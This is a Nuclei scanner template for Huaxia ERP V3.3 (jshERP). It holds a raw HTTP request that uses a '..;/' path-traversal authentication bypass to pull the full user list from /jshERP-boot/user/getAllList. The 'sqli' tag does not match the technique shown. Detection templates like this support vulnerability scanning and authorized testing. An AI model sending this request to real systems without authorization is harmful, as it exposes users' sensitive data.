id: huaxia-erp-xielou

info:
  name: 华夏ERPV3.3存在信息泄漏漏洞，可获取用户敏感信息。
  author: yichen
  severity: high
  description: |
    华夏ERPV3.3存在信息泄漏漏洞，可获取用户敏感信息。
  reference:
    - https://mp.weixin.qq.com/s/c12Frd6hp0a3r8A9-lVr-g
  verified: true
  max-request: 1
  tags: huaxia,sqli


http:
- raw:
  - |+
    @timeout: 30s
    GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
    Host: {{Hostname}}
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

  matchers:
    - type: dsl
      dsl:
        - contains(body,"200") && status_code == 200
